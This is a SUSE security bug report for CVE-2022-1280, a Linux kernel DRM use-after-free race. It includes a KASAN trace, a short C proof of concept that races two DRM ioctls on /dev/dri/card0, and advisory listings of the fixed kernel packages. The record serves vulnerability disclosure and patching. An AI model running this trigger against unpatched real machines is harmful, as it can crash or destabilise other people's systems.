Bug 1197914 - (CVE-2022-1280) VUL-0: CVE-2022-1280: kernel-source: concurrency uaf between drm_setmaster_ioctl and drm_mode_getresources
(CVE-2022-1280)
VUL-0: CVE-2022-1280: kernel-source: concurrency uaf between drm_setmaster_io...
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Security Team bot
Security Team bot
https://smash.suse.de/issue/327827/
CVSSv3.1:SUSE:CVE-2022-1280:7.0:(AV:L...
:
Depends on:
Blocks: 1198590
  Show dependency treegraph
 
Reported: 2022-04-01 09:54 UTC by Gianluca Gabrielli
Modified: 2022-11-03 16:51 UTC (History)
3 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Gianluca Gabrielli 2022-04-01 09:54:03 UTC
From linux-distros private ML
-----------------------------

We recently discovered a concurrency uaf in drm of the latest kernel
version (Linux 4.19.237).

The root cause of this race is that drm_setmaster_ioctl can free an old
*fpriv->master* in drm_new_set_master, while drm_mode_getresources holds a
freed *fpriv->master *in drm_lease_held due to the absence of proper lock.

And there is the kasan's report:

BUG: KASAN: use-after-free in drm_lease_held+0x149/0x150
Read of size 8 at addr ffff8880341984c0 by task drm1/2598

CPU: 0 PID: 2598 Comm: drm1 Not tainted 4.19.237 #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
Ubuntu-1.8.2-1ubuntu1 04/01/2014
Call Trace:
 dump_stack+0xa7/0xde
 print_address_description+0x67/0x22a
 ? drm_lease_held+0x149/0x150
 kasan_report.part.0.cold+0x1f1/0x316
 drm_lease_held+0x149/0x150
 drm_mode_getresources+0x7fd/0xb10
 ? drm_modeset_unregister_all+0x30/0x30
 ? drm_dbg+0xce/0x170
 ? drm_puts+0x80/0x80
serial8250: too much work for irq4
l+0x30/0x30
 drm_ioctl_kernel+0x1b8/0x250
 ? drm_setversion+0x830/0x830
 ? avc_ss_reset+0x140/0x140
 drm_ioctl+0x44e/0x8e0
 ? drm_modeset_unregister_all+0x30/0x30
 ? drm_version+0x3b0/0x3b0
 ? drm_version+0x3b0/0x3b0
 do_vfs_ioctl+0xa69/0x1020
 ? selinux_file_ioctl+0x4f4/0x760
 ? ioctl_preallocate+0x1d0/0x1d0
 ? selinux_inode_setattr+0x670/0x670
 ? iterate_fd+0x1b0/0x1b0
 ? __switch_to_asm+0x35/0x70
 ? __switch_to_asm+0x35/0x70
 ? __switch_to_asm+0x41/0x70
 ? __switch_to_asm+0x35/0x70
 ksys_ioctl+0x76/0xa0
 __x64_sys_ioctl+0x6f/0xb0
 do_syscall_64+0xa0/0x2e0
 ? syscall_return_slowpath+0x135/0x1d0
 entry_SYSCALL_64_after_hwframe+0x44/0xa9
RIP: 0033:0x7ff5106c8047
Code: 00 00 00 48 8b 05 51 6e 2c 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff
ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff
ff 73 01 c3 48 8b 0d 21 6e 2c 00 f7 d8 64 89 01 48
RSP: 002b:00007ff50fdc8f38 EFLAGS: 00000202 ORIG_RAX: 0000000000000010
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff5106c8047
RDX: 00000000006010c0 RSI: 00000000c04064a0 RDI: 0000000000000004
RBP: 00007ff50fdc8f50 R08: 00007ff50fdc9700 R09: 00007ff50fdc9700
R10: 00007ff50fdc99d0 R11: 0000000000000202 R12: 0000000000000000
R13: 00007ffd5e45218f R14: 00007ff50fdc99c0 R15: 0000000000000000

Allocated by task 2596:
 kasan_kmalloc+0xc2/0xe0
 kmem_cache_alloc_trace+0xf8/0x1b0
 drm_master_create+0x40/0x630
 drm_new_set_master+0x6d/0x250
 drm_master_open+0xe1/0x110
 drm_open+0x417/0x6d0
 drm_stub_open+0x275/0x4b0
 chrdev_open+0x249/0x620
 do_dentry_open+0x448/0xf60
 path_openat+0xa14/0x4090
 do_filp_open+0x18c/0x3f0
 do_sys_open+0x2e6/0x430
 do_syscall_64+0xa0/0x2e0
 entry_SYSCALL_64_after_hwframe+0x44/0xa9

Freed by task 2597:
 __kasan_slab_free+0x12f/0x180
 kfree+0xa2/0x1c0
 drm_new_set_master+0x165/0x250
 drm_setmaster_ioctl+0x1dc/0x2b0
 drm_ioctl_kernel+0x1b8/0x250
 drm_ioctl+0x44e/0x8e0
 do_vfs_ioctl+0xa69/0x1020
 ksys_ioctl+0x76/0xa0
 __x64_sys_ioctl+0x6f/0xb0
 do_syscall_64+0xa0/0x2e0
 entry_SYSCALL_64_after_hwframe+0x44/0xa9

The buggy address belongs to the object at ffff8880341984b8
                which belongs to the cache kmalloc-256 of size 256
The buggy address is located 8 bytes inside of
                256-byte region [ffff8880341984b8, ffff8880341985b8)
The buggy address belongs to the page:
page:ffffea0000d06600 count:1 mapcount:0 mapping:ffff888035c0f240 index:0x0
compound_mapcount: 0
flags: 0x100000000008100(slab|head)
raw: 0100000000008100 ffffea0000d0b808 ffff888035c00a70 ffff888035c0f240
raw: 0000000000000000 00000000001b001b 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected

Memory state around the buggy address:
 ffff888034198380: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
 ffff888034198400: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
> ffff888034198480: fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb fb
                                           ^
 ffff888034198500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
 ffff888034198580: fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc fc
==================================================================

My unstable PoC is shown below (tested on Linux 4.19.237):

#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <pthread.h>
#include <sys/xattr.h>
#include <sys/shm.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <drm/drm.h>
#include <drm/drm_mode.h>

#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
} while (0)
int fd;
char a[0x100];
void *thread1(void *arg)
{

ioctl(fd, DRM_IOCTL_SET_MASTER, 0);

}
void *thread2(void *arg)
{
ioctl(fd, DRM_IOCTL_MODE_GETRESOURCES, &a);
}
int main(void)
{
pthread_t thr1,thr2;

int fd1 = open("/dev/dri/card0",0);
fd = open("/dev/dri/card0",0);
int fd2 = dup3(fd,fd1,0);
int s = pthread_create(&thr1,NULL,thread1,(void*)NULL);
if(s != 0)
errExit("pthread_create");
s = pthread_create(&thr2,NULL,thread2,(void*)NULL);
if(s != 0)
errExit("pthread_create");
pthread_join(thr1,NULL);
pthread_join(thr2,NULL);
close(fd);
}


I noticed that in the latest 5.17.x version, the reference to fpriv->master
is now done by "drm_file_get_master", which can increase master's refcount
to avoid some race. However, after reported to security@kernel.org, they
think the backport is a hard work as there are so many details to consider.

I'll post this bug to the public before 7/4/22.
Comment 22 Gianluca Gabrielli 2022-04-08 13:52:51 UTC
CVE-2022-1280 assigned. Please add it to the changes file on the next kernel round.
Comment 25 Gianluca Gabrielli 2022-04-12 12:26:14 UTC
now published to osss
Comment 26 Takashi Iwai 2022-04-12 13:02:09 UTC
I merged the branches and updated the patch references accordingly too.

Reassigned back to security team.
Comment 27 Swamp Workflow Management 2022-04-13 19:24:01 UTC
SUSE-SU-2022:1183-1: An update that solves 15 vulnerabilities and has 32 fixes is now available.

Category: security (important)
Bug References: 1065729,1156395,1175667,1177028,1178134,1179639,1180153,1189562,1194649,1195640,1195926,1196018,1196196,1196478,1196761,1196823,1197227,1197243,1197300,1197302,1197331,1197343,1197366,1197389,1197462,1197501,1197534,1197661,1197675,1197702,1197811,1197812,1197815,1197817,1197819,1197820,1197888,1197889,1197894,1197914,1198027,1198028,1198029,1198030,1198031,1198032,1198033
CVE References: CVE-2021-45868,CVE-2022-0850,CVE-2022-0854,CVE-2022-1011,CVE-2022-1016,CVE-2022-1048,CVE-2022-1055,CVE-2022-1195,CVE-2022-1198,CVE-2022-1199,CVE-2022-1205,CVE-2022-27666,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: 
Sources used:
openSUSE Leap 15.4 (src):    dtb-aarch64-5.3.18-150300.59.63.1, kernel-preempt-5.3.18-150300.59.63.1
openSUSE Leap 15.3 (src):    dtb-aarch64-5.3.18-150300.59.63.1, kernel-64kb-5.3.18-150300.59.63.1, kernel-debug-5.3.18-150300.59.63.1, kernel-default-5.3.18-150300.59.63.1, kernel-default-base-5.3.18-150300.59.63.1.150300.18.39.1, kernel-docs-5.3.18-150300.59.63.1, kernel-kvmsmall-5.3.18-150300.59.63.1, kernel-obs-build-5.3.18-150300.59.63.1, kernel-obs-qa-5.3.18-150300.59.63.1, kernel-preempt-5.3.18-150300.59.63.1, kernel-source-5.3.18-150300.59.63.1, kernel-syms-5.3.18-150300.59.63.1, kernel-zfcpdump-5.3.18-150300.59.63.1
SUSE Linux Enterprise Workstation Extension 15-SP3 (src):    kernel-default-5.3.18-150300.59.63.1, kernel-preempt-5.3.18-150300.59.63.1
SUSE Linux Enterprise Module for Live Patching 15-SP3 (src):    kernel-default-5.3.18-150300.59.63.1, kernel-livepatch-SLE15-SP3_Update_17-1-150300.7.3.1
SUSE Linux Enterprise Module for Legacy Software 15-SP3 (src):    kernel-default-5.3.18-150300.59.63.1
SUSE Linux Enterprise Module for Development Tools 15-SP3 (src):    kernel-docs-5.3.18-150300.59.63.1, kernel-obs-build-5.3.18-150300.59.63.1, kernel-preempt-5.3.18-150300.59.63.1, kernel-source-5.3.18-150300.59.63.1, kernel-syms-5.3.18-150300.59.63.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    kernel-64kb-5.3.18-150300.59.63.1, kernel-default-5.3.18-150300.59.63.1, kernel-default-base-5.3.18-150300.59.63.1.150300.18.39.1, kernel-preempt-5.3.18-150300.59.63.1, kernel-source-5.3.18-150300.59.63.1, kernel-zfcpdump-5.3.18-150300.59.63.1
SUSE Linux Enterprise Micro 5.2 (src):    kernel-default-5.3.18-150300.59.63.1, kernel-default-base-5.3.18-150300.59.63.1.150300.18.39.1
SUSE Linux Enterprise Micro 5.1 (src):    kernel-default-5.3.18-150300.59.63.1, kernel-default-base-5.3.18-150300.59.63.1.150300.18.39.1
SUSE Linux Enterprise High Availability 15-SP3 (src):    kernel-default-5.3.18-150300.59.63.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 28 Swamp Workflow Management 2022-04-14 10:24:58 UTC
SUSE-SU-2022:1196-1: An update that solves 22 vulnerabilities, contains three features and has 39 fixes is now available.

Category: security (important)
Bug References: 1065729,1114648,1180153,1184207,1189562,1191428,1191451,1191580,1192273,1193738,1194163,1194541,1194580,1194586,1194590,1194591,1194943,1195051,1195353,1195403,1195480,1195482,1196018,1196114,1196339,1196367,1196468,1196478,1196488,1196514,1196639,1196657,1196723,1196761,1196830,1196836,1196901,1196942,1196973,1196999,1197099,1197227,1197331,1197366,1197462,1197531,1197661,1197675,1197754,1197755,1197756,1197757,1197758,1197760,1197763,1197806,1197894,1197914,1198031,1198032,1198033
CVE References: CVE-2021-39713,CVE-2021-45868,CVE-2022-0001,CVE-2022-0002,CVE-2022-0812,CVE-2022-0850,CVE-2022-1016,CVE-2022-1048,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-23960,CVE-2022-26490,CVE-2022-26966,CVE-2022-27666,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: SLE-15288,SLE-18234,SLE-24125
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP5 (src):    kernel-default-4.12.14-122.116.1
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    kernel-docs-4.12.14-122.116.1, kernel-obs-build-4.12.14-122.116.1
SUSE Linux Enterprise Server 12-SP5 (src):    kernel-default-4.12.14-122.116.1, kernel-source-4.12.14-122.116.1, kernel-syms-4.12.14-122.116.1
SUSE Linux Enterprise Live Patching 12-SP5 (src):    kernel-default-4.12.14-122.116.1, kgraft-patch-SLE12-SP5_Update_30-1-8.3.1
SUSE Linux Enterprise High Availability 12-SP5 (src):    kernel-default-4.12.14-122.116.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 29 Swamp Workflow Management 2022-04-14 13:22:40 UTC
SUSE-SU-2022:1197-1: An update that solves 21 vulnerabilities and has 7 fixes is now available.

Category: security (important)
Bug References: 1179639,1189562,1193731,1194943,1195051,1195254,1195353,1195403,1195939,1196018,1196196,1196468,1196488,1196761,1196823,1196830,1196836,1196956,1197227,1197331,1197366,1197389,1197462,1197702,1197914,1198031,1198032,1198033
CVE References: CVE-2021-0920,CVE-2021-39698,CVE-2021-45868,CVE-2022-0850,CVE-2022-0854,CVE-2022-1016,CVE-2022-1048,CVE-2022-1055,CVE-2022-23036,CVE-2022-23037,CVE-2022-23038,CVE-2022-23039,CVE-2022-23040,CVE-2022-23041,CVE-2022-23042,CVE-2022-26490,CVE-2022-26966,CVE-2022-27666,CVE-2022-28388,CVE-2022-28389,CVE-2022-28390
JIRA References: 
Sources used:
SUSE Manager Server 4.1 (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-obs-build-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1
SUSE Manager Retail Branch Server 4.1 (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1
SUSE Manager Proxy 4.1 (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1
SUSE Linux Enterprise Server for SAP 15-SP2 (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-obs-build-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1
SUSE Linux Enterprise Server 15-SP2-LTSS (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-obs-build-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1
SUSE Linux Enterprise Server 15-SP2-BCL (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1
SUSE Linux Enterprise Realtime Extension 15-SP2 (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1
SUSE Linux Enterprise Module for Live Patching 15-SP2 (src):    kernel-default-5.3.18-150200.24.112.1, kernel-livepatch-SLE15-SP2_Update_26-1-150200.5.5.1
SUSE Linux Enterprise Micro 5.0 (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2
SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-obs-build-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1
SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-obs-build-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1
SUSE Linux Enterprise High Availability 15-SP2 (src):    kernel-default-5.3.18-150200.24.112.1
SUSE Enterprise Storage 7 (src):    kernel-default-5.3.18-150200.24.112.1, kernel-default-base-5.3.18-150200.24.112.1.150200.9.52.2, kernel-docs-5.3.18-150200.24.112.1, kernel-obs-build-5.3.18-150200.24.112.1, kernel-preempt-5.3.18-150200.24.112.1, kernel-source-5.3.18-150200.24.112.1, kernel-syms-5.3.18-150200.24.112.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 42 Swamp Workflow Management 2022-05-12 19:18:18 UTC
SUSE-SU-2022:1651-1: An update that solves 13 vulnerabilities and has 20 fixes is now available.

Category: security (important)
Bug References: 1028340,1065729,1071995,1084513,1114648,1121726,1129770,1137728,1172456,1183723,1187055,1191647,1191958,1194625,1196018,1196247,1196657,1196901,1197075,1197343,1197663,1197888,1197914,1198217,1198228,1198400,1198413,1198516,1198660,1198687,1198742,1198825,1199012
CVE References: CVE-2018-7755,CVE-2019-20811,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-43389,CVE-2022-1011,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-23960,CVE-2022-28748
JIRA References: 
Sources used:
SUSE Linux Enterprise Server 12-SP5 (src):    kernel-azure-4.12.14-16.97.1, kernel-source-azure-4.12.14-16.97.1, kernel-syms-azure-4.12.14-16.97.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 43 Swamp Workflow Management 2022-05-16 13:23:45 UTC
SUSE-SU-2022:1669-1: An update that solves 16 vulnerabilities, contains 6 features and has 29 fixes is now available.

Category: security (important)
Bug References: 1028340,1071995,1137728,1152472,1152489,1177028,1179878,1182073,1183723,1187055,1191647,1193556,1193842,1194625,1195651,1195926,1196018,1196114,1196367,1196514,1196639,1196942,1197157,1197391,1197656,1197660,1197677,1197914,1197926,1198077,1198217,1198330,1198400,1198413,1198437,1198448,1198484,1198515,1198516,1198534,1198742,1198825,1198989,1199012,1199024
CVE References: CVE-2020-27835,CVE-2021-0707,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-4154,CVE-2022-0812,CVE-2022-1158,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-28356,CVE-2022-28748,CVE-2022-28893,CVE-2022-29156
JIRA References: SLE-13208,SLE-13513,SLE-15172,SLE-15175,SLE-18234,SLE-8449
Sources used:
SUSE Linux Enterprise Realtime Extension 15-SP3 (src):    release-notes-sle_rt-15.3.20220422-150300.3.3.2
SUSE Linux Enterprise Module for Realtime 15-SP3 (src):    kernel-rt-5.3.18-150300.88.2, kernel-rt_debug-5.3.18-150300.88.2, kernel-source-rt-5.3.18-150300.88.2, kernel-syms-rt-5.3.18-150300.88.1, release-notes-sle_rt-15.3.20220422-150300.3.3.2
SUSE Linux Enterprise Micro 5.2 (src):    kernel-rt-5.3.18-150300.88.2
SUSE Linux Enterprise Micro 5.1 (src):    kernel-rt-5.3.18-150300.88.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 44 Swamp Workflow Management 2022-05-16 13:27:36 UTC
SUSE-SU-2022:1668-1: An update that solves 13 vulnerabilities and has 17 fixes is now available.

Category: security (important)
Bug References: 1028340,1071995,1084513,1114648,1121726,1129770,1137728,1172456,1183723,1187055,1191647,1191958,1194625,1195651,1196018,1196247,1197075,1197343,1197391,1197663,1197888,1197914,1198217,1198413,1198516,1198687,1198742,1198825,1198989,1199012
CVE References: CVE-2018-7755,CVE-2019-20811,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-43389,CVE-2022-1011,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-28356,CVE-2022-28748
JIRA References: 
Sources used:
SUSE Linux Enterprise Real Time Extension 12-SP5 (src):    kernel-rt-4.12.14-10.89.1, kernel-rt_debug-4.12.14-10.89.1, kernel-source-rt-4.12.14-10.89.1, kernel-syms-rt-4.12.14-10.89.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 45 Swamp Workflow Management 2022-05-16 13:37:33 UTC
SUSE-SU-2022:1676-1: An update that solves 16 vulnerabilities, contains 6 features and has 25 fixes is now available.

Category: security (important)
Bug References: 1028340,1065729,1071995,1121726,1137728,1152489,1177028,1179878,1182073,1183723,1187055,1191647,1193556,1193842,1195926,1196018,1196114,1196367,1196514,1196639,1196942,1197157,1197391,1197656,1197660,1197914,1197926,1198217,1198330,1198400,1198413,1198437,1198448,1198484,1198515,1198516,1198660,1198742,1198825,1199012,1199024
CVE References: CVE-2020-27835,CVE-2021-0707,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-4154,CVE-2022-0812,CVE-2022-1158,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-28356,CVE-2022-28748,CVE-2022-28893,CVE-2022-29156
JIRA References: SLE-13208,SLE-13513,SLE-15172,SLE-15175,SLE-15176,SLE-8449
Sources used:
openSUSE Leap 15.3 (src):    kernel-azure-5.3.18-150300.38.56.1, kernel-source-azure-5.3.18-150300.38.56.1, kernel-syms-azure-5.3.18-150300.38.56.1
SUSE Linux Enterprise Module for Public Cloud 15-SP3 (src):    kernel-azure-5.3.18-150300.38.56.1, kernel-source-azure-5.3.18-150300.38.56.1, kernel-syms-azure-5.3.18-150300.38.56.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 46 Swamp Workflow Management 2022-05-16 16:23:59 UTC
SUSE-SU-2022:1687-1: An update that solves 16 vulnerabilities, contains 6 features and has 29 fixes is now available.

Category: security (important)
Bug References: 1028340,1071995,1137728,1152472,1152489,1177028,1179878,1182073,1183723,1187055,1191647,1193556,1193842,1194625,1195651,1195926,1196018,1196114,1196367,1196514,1196639,1196942,1197157,1197391,1197656,1197660,1197677,1197914,1197926,1198077,1198217,1198330,1198400,1198413,1198437,1198448,1198484,1198515,1198516,1198534,1198742,1198825,1198989,1199012,1199024
CVE References: CVE-2020-27835,CVE-2021-0707,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-4154,CVE-2022-0812,CVE-2022-1158,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-28356,CVE-2022-28748,CVE-2022-28893,CVE-2022-29156
JIRA References: SLE-13208,SLE-13513,SLE-15172,SLE-15175,SLE-18234,SLE-8449
Sources used:
openSUSE Leap 15.4 (src):    dtb-aarch64-5.3.18-150300.59.68.1, kernel-preempt-5.3.18-150300.59.68.1
openSUSE Leap 15.3 (src):    dtb-aarch64-5.3.18-150300.59.68.1, kernel-64kb-5.3.18-150300.59.68.1, kernel-debug-5.3.18-150300.59.68.1, kernel-default-5.3.18-150300.59.68.1, kernel-default-base-5.3.18-150300.59.68.1.150300.18.41.3, kernel-docs-5.3.18-150300.59.68.1, kernel-kvmsmall-5.3.18-150300.59.68.1, kernel-obs-build-5.3.18-150300.59.68.1, kernel-obs-qa-5.3.18-150300.59.68.1, kernel-preempt-5.3.18-150300.59.68.1, kernel-source-5.3.18-150300.59.68.1, kernel-syms-5.3.18-150300.59.68.1, kernel-zfcpdump-5.3.18-150300.59.68.1
SUSE Linux Enterprise Workstation Extension 15-SP3 (src):    kernel-default-5.3.18-150300.59.68.1, kernel-preempt-5.3.18-150300.59.68.1
SUSE Linux Enterprise Module for Live Patching 15-SP3 (src):    kernel-default-5.3.18-150300.59.68.1, kernel-livepatch-SLE15-SP3_Update_18-1-150300.7.5.1
SUSE Linux Enterprise Module for Legacy Software 15-SP3 (src):    kernel-default-5.3.18-150300.59.68.1
SUSE Linux Enterprise Module for Development Tools 15-SP3 (src):    kernel-docs-5.3.18-150300.59.68.1, kernel-obs-build-5.3.18-150300.59.68.1, kernel-preempt-5.3.18-150300.59.68.1, kernel-source-5.3.18-150300.59.68.1, kernel-syms-5.3.18-150300.59.68.1
SUSE Linux Enterprise Module for Basesystem 15-SP3 (src):    kernel-64kb-5.3.18-150300.59.68.1, kernel-default-5.3.18-150300.59.68.1, kernel-default-base-5.3.18-150300.59.68.1.150300.18.41.3, kernel-preempt-5.3.18-150300.59.68.1, kernel-source-5.3.18-150300.59.68.1, kernel-zfcpdump-5.3.18-150300.59.68.1
SUSE Linux Enterprise Micro 5.2 (src):    kernel-default-5.3.18-150300.59.68.1, kernel-default-base-5.3.18-150300.59.68.1.150300.18.41.3
SUSE Linux Enterprise Micro 5.1 (src):    kernel-default-5.3.18-150300.59.68.1, kernel-default-base-5.3.18-150300.59.68.1.150300.18.41.3
SUSE Linux Enterprise High Availability 15-SP3 (src):    kernel-default-5.3.18-150300.59.68.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 47 Swamp Workflow Management 2022-05-16 16:28:44 UTC
SUSE-SU-2022:1686-1: An update that solves 13 vulnerabilities and has 16 fixes is now available.

Category: security (important)
Bug References: 1028340,1071995,1084513,1114648,1121726,1129770,1137728,1172456,1183723,1187055,1191647,1191958,1194625,1196018,1196247,1197075,1197343,1197391,1197663,1197888,1197914,1198217,1198413,1198516,1198687,1198742,1198825,1198989,1199012
CVE References: CVE-2018-7755,CVE-2019-20811,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-43389,CVE-2022-1011,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-28356,CVE-2022-28748
JIRA References: 
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP5 (src):    kernel-default-4.12.14-122.121.2
SUSE Linux Enterprise Software Development Kit 12-SP5 (src):    kernel-docs-4.12.14-122.121.2, kernel-obs-build-4.12.14-122.121.1
SUSE Linux Enterprise Server 12-SP5 (src):    kernel-default-4.12.14-122.121.2, kernel-source-4.12.14-122.121.2, kernel-syms-4.12.14-122.121.2
SUSE Linux Enterprise Live Patching 12-SP5 (src):    kernel-default-4.12.14-122.121.2, kgraft-patch-SLE12-SP5_Update_31-1-8.5.2
SUSE Linux Enterprise High Availability 12-SP5 (src):    kernel-default-4.12.14-122.121.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 64 Marcus Meissner 2022-11-03 16:51:59 UTC
done